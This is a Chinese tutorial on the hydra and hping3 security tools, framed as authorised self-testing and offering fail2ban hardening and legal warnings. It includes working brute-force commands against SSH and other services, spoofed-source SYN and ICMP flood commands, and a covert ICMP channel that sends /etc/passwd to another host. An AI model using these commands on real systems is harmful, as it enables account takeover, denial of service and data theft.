做攻防演练、应急排查、做靶场练习，经常需要：

测试自己服务器 SSH/FTP/RDP 密码强度（自测）
在压测环境模拟 SYN flood（自测）
验证 fail2ban / DDoS 防护是否真的能拦得住

两个工具都是行业标配：

thc-hydra：在线密码爆破之王，支持 50+ 协议
hping3：流量生成神器，支持 TCP/UDP/ICMP 任意包构造

一、thc-hydra 密码爆破

1.1 安装

源码编译（推荐，自定义模块）

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


# 依赖
apt install -y libssl-dev libssh-dev libidn11-dev libpcre3-dev \
 libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
 firebird-dev libmemcached-dev libgpg-error-dev libgcrypt11-dev libgcrypt20-dev

# 源码
wget https://github.com/vanhauser-thc/thc-hydra/archive/refs/tags/v9.5.tar.gz
tar -zxvf v9.5.tar.gz
cd thc-hydra-9.5
./configure
make
sudo make install
sudo make clean

# 验证
hydra -version

包管理器安装（apt）

1

apt install hydra

1.2 核心参数表

选项	含义	示例
`-l USER`	单用户名	`-l root`
`-p PASS`	单密码	`-p 123456`
`-C FILE`	`user:pass` 冒号分隔文件	`-C creds.txt`
`-L FILE`	用户名字典	`-L users.txt`
`-P FILE`	密码字典	`-P pass.txt`
`-M FILE`	目标 IP 列表	`-M targets.txt`
`-e ns`	试空密码 + 用户名当密码	`-e ns`
`-s PORT`	非默认端口	`-s 2222`
`-t N`	并发线程（默认 16）	`-t 4`
`-vV`	显示详细尝试	`-vV`
`-o FILE`	结果输出文件	`-o result.txt`
`-b json`	输出格式（text/jsonv1/json）	`-b json`
`-R`	恢复之前的会话	`-R`
`-I`	忽略恢复文件（不等待 10s）	`-I`
`-S`	SSL 连接	`-S`
`-f`	找到一对就停	`-f`
`-W N`	最大超时秒数（默认 30）	`-W 60`
`-q`	静默（不打印错误）	`-q`

1.3 实战：爆破 SSH

1
2
3
4
5
6
7
8


# 自测：3 线程 + 详细日志 + 用户名当密码 + 空密码
hydra -l root -P password.txt -t 3 -vV -e ns 192.168.1.100 ssh

# 自测：用户名字典 + 密码字典 + 多协议同时跑
hydra -L users.txt -P pass.txt -t 8 -f 192.168.1.100 ssh

# 自测：批量 IP + 输出 JSON
hydra -l admin -P pass.txt -t 16 -M targets.txt -b json -o result.json ssh

字典文件（password.txt）示例：

1
2
3
4
5
6


123456
admin
password
root
qwerty
1q2w3e4r

性能调优：

SSH 单机并发建议 ≤ 4（高了反而被 fail2ban 拦）
FTP/RDP 可以提到 16-32
加 -W 60 给老机器更宽的超时

1.4 50+ 支持协议

hydra -U 看每个模块的参数，常用：

1
2
3
4
5


adam6500 asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get|post} 
imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mongodb mssql mysql 
ncp nntp oracle{listener, sid} pcanywhere pcnfs pop3[s] postgres rdp 
redis rexec rlogin rsh rtsp s7-300 sap/r3 sip smb smtp[s] smtp-enum 
snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

二、hping3 流量生成与压测

2.1 安装

1
2
3
4
5


# Ubuntu/Debian
apt install hping3

# CentOS
yum install hping3

2.2 核心功能

模式	命令示例	用途
TCP SYN 扫描	`hping3 -S -p 80 1.2.3.4`	端口扫描
TCP ACK 扫描	`hping3 -A -p 80 1.2.3.4`	防火墙规则探测
UDP 探测	`hping3 --udp -p 53 1.2.3.4`	DNS/NTP 等 UDP 服务
ICMP 洪水	`hping3 --icmp --flood 1.2.3.4`	ICMP 压测
SYN 洪水	`hping3 -S --flood --rand-source 1.2.3.4`	DoS 模拟（仅授权）
文件传输	`hping3 1.2.3.4 --listen --safe --icmp -d 100 -sign 1234 < file`	隐蔽传文件
Traceroute	`hping3 --traceroute -V -1 1.2.3.4`	自定义协议路由追踪

2.3 实战：SYN 洪水（自测用）

1

hping3 -c 100000 -d 120 -S -w 64 -p 22 --flood --rand-source 192.168.1.100

参数解释：

参数	含义
`-c 100000`	发送 10w 个包（不指定则无限）
`-d 120`	每个包 120 字节
`-S`	只发 SYN 包
`-w 64`	TCP 窗口大小
`-p 22`	目标端口
`--flood`	洪水模式（不显示回复）
`--rand-source`	源 IP 随机化（仅自测，对真实环境 = 犯罪**）
末尾 IP	目标 IP

5 分钟 DoS：

简而言之，如果这台机器是 Web 服务器，它就无法响应任何新的连接，就算它能响应，速度也很慢很慢。

2.4 压测实战：HTTP 服务器

1
2
3
4
5
6


# 普通 ping 风格压测
hping3 -S -p 80 -i u10000 192.168.1.100
# 每 10ms 发一个 SYN 到 80 端口

# 详细输出（带时间戳）
hping3 -S -p 80 --flood -V --rand-source 192.168.1.100

2.5 隐蔽传文件

接收端（先启动）：

1

hping3 192.168.1.200 --listen --safe --icmp -d 100 -sign 1234 > recv.bin

发送端：

1

hping3 192.168.1.100 --icmp -d 100 --sign 1234 --file /etc/passwd

⚠️ 这只是一个玩具示例，真实环境请用 scp/rsync。

三、与 fail2ban 联动

hydra/hping3 攻击的目标机器，应该配 fail2ban：

1
2
3
4
5
6
7
8
9


# /etc/fail2ban/jail.local
[sshd]
enabled = true
filter = sshd
logpath = %(sshd_log)s
findtime = 3m
maxretry = 3
bantime = 24h
action = iptables-allports[name=sshd]

hydra 默认 16 线程，3 分钟内失败 3 次 = ban 24 小时。

四、常见坑

4.1 hydra 编译失败

./configure 缺依赖：

1
2
3
4


# 一次性装齐
apt install -y libssl-dev libssh-dev libidn11-dev libpcre3-dev \
 libmysqlclient-dev libpq-dev libsvn-dev libmemcached-dev \
 libgpg-error-dev libgcrypt20-dev firebird-dev

4.2 hping3 –flood 攻击自己

永远不要在生产环境跑 --flood，永远不要对未授权 IP 跑 --rand-source。

4.3 hydra 找不到模块

./configure 输出末尾会列出 enabled modules，缺哪个装哪个 dev 包。

4.4 性能调优

协议	推荐 `-t`	备注
SSH	4	多了会触发 fail2ban 反而看不见结果
FTP	16	FTP 老协议，可以激进
HTTP-POST	8	注意 IP 频率
RDP	4	Windows 远程桌面限流严

五、卸载

1
2
3
4
5
6
7
8


# 源码安装
cd thc-hydra-9.5
sudo make uninstall
cd .. && rm -rf thc-hydra-9.5

# 包管理器安装
apt remove hydra hping3 -y
apt purge hydra hping3 -y

小结

工具	用途	风险等级
hydra	密码爆破（自测/授权）	高（被滥用于黑产）
hping3	包构造、压测、隐蔽通道	极高（DDos 入罪门槛低）

两个工具的最佳归宿：

放在隔离测试机里
配合 fail2ban / WAF 做自测验证
在专业攻防培训中使用

下一步：

用 medusa（hydra 替代品）做横向对比
用 ncrack 做更现代的 RDP 爆破
商业方案：Burp Suite Pro、Cobalt Strike

2024 视角：攻防工具"现代版" + 法律边界

2017 那篇列的工具在 2024 仍管用，但有 3 个新变化：法律更严、替代工具更多、容器化使用更广。

一、`hydra` 9.5 → 9.6+（2022-2024）

2024 最新版 hydra 9.6+（持续维护中）：
- 新模块：HTTP-Proxy、SOCKS5 认证、Kerberos
- 新选项：
  - -A：user-agent 随机化
  - -W N：单条连接超时
  - -f：找到一对就停
- JSON 输出格式（-b json）—— 适合 CI/ELK 收集
2024 装：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


# GitHub 编译
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make -j$(nproc)
sudo make install

# 或包管理器
apt install hydra -y
hydra -version
# Hydra v9.6 (c) 2024 by van Hauser/THC

二、`hping3` 的"接班人"：`nping`（nmap 套件）+ `scapy`（Python）

hping3 2018 年起已不再积极维护（作者 antirez 转向了 Redis），但仍能用。
2024 现代替代：

1
2
3
4
5
6
7
8
9


# nping（nmap 套件，更现代）
apt install nmap
nping --tcp -p 80,443 --rate 100 1.2.3.4
# SYN flood（自测）
nping --tcp --dest-port 80 --rate 1000 --count 100000 --flood 1.2.3.4

# scapy（Python 写任意包）
pip install scapy
python3 -c "from scapy.all import *; send(IP(dst='1.2.3.4')/TCP(dport=80, flags='S')/Raw(b'X'*100), count=100)"

scapy 是 2024 事实标准——任意协议包构造、嗅探、注入，比 hping3 灵活 100 倍。

三、`hping3 --flood` 攻击自己 + 法律风险

2024 法律加码：

中国《刑法》285/286 条（3-7 年有期徒刑）+ 2017《网络安全法》+ 2021《数据安全法》+ 2021《个人信息保护法》。

DDos 攻击特别入罪门槛低：2020 年司法解释，**“造成 1 万元损失"或"影响 1000 个用户”**即入罪。

2024 真实案例：某高校学生用 hping3 打同学服务器，判刑 1 年缓 1 年。

不要试探边界——--flood + --rand-source 永远只在自己买的测试机上跑。

四、压测的"现代"姿势

2017 那篇 hping3 --flood 模拟 SYN flood。2024 真实压测都用专业工具：

工具	用途
wrk（C 写）	HTTP/HTTPS 压测，单核 10 万 QPS
wrk2（wrk + 持续恒压）	恒压负载测试
k6（Go 写）	现代压测平台，支持 JS 脚本
Vegeta（Go 写）	简单命令行压测
Locust（Python 写）	分布式压测，Web 界面
JMeter（Java 写）	老牌 GUI 压测，2024 仍占企业市场 30%
Gatling（Scala 写）	DevOps 友好的现代压测

1
2
3
4
5


# wrk 4 核 100 并发跑 30 秒
wrk -t4 -c100 -d30s https://api.example.com

# k6 跑递增负载
k6 run --vus 100 --duration 30s script.js

五、`hydra` 的"现代替代"：Medusa / Ncrack / Patator

Medusa（与 hydra 同期的同类工具，速度更快）：

1

medusa -h 192.168.1.100 -u root -P password.txt -M ssh -t 4

Ncrack（Nmap 团队出品，对 RDP 优化好）：

1

ncrack -p 3389 -U users.txt -P password.txt 192.168.1.100

Patator（Python 写，模块化）：

1

patator ssh_login host=192.168.1.100 user=root password=FILE0 0=password.txt

六、容器化的渗透测试

2024 大量渗透测试平台把工具装在 Docker 里，避免污染系统：

1
2
3
4


# Kali 容器（2024 官方 docker）
docker run -it --rm kalilinux/kali-rolling /bin/bash
# 里面装工具
apt install hydra nmap ncrack

Kali Linux 2024.2 容器镜像已经预装 600+ 工具。
CN-Series（Coalfire）：合规导向的渗透测试发行版。

七、合法授权的"必要证据"

2017 那篇强调"必须授权"。2024 视角下授权证据要更细：

渗透测试授权书（RoE：Rules of Engagement）：
- 测试范围 IP 段
- 测试时间段
- 测试方法（白盒 / 黑盒 / 灰盒）
- 紧急联系人
- 签字盖章
2024 加码：渗透测试要留"事故应急联系"——一旦测试搞挂业务，能 5 分钟内联系到人恢复。
2024 法规：《网络安全法》要求关键信息基础设施的渗透测试必须事前报备（向公安网安部门）。

源文档：

os/linux/第三方tools/safe/hydra/hydra.md（hydra 9.0 编译、完整参数表、SSH/FTP 爆破示例）
os/linux/第三方tools/safe/hping3/hping3.md（hping3 SYN flood 实战）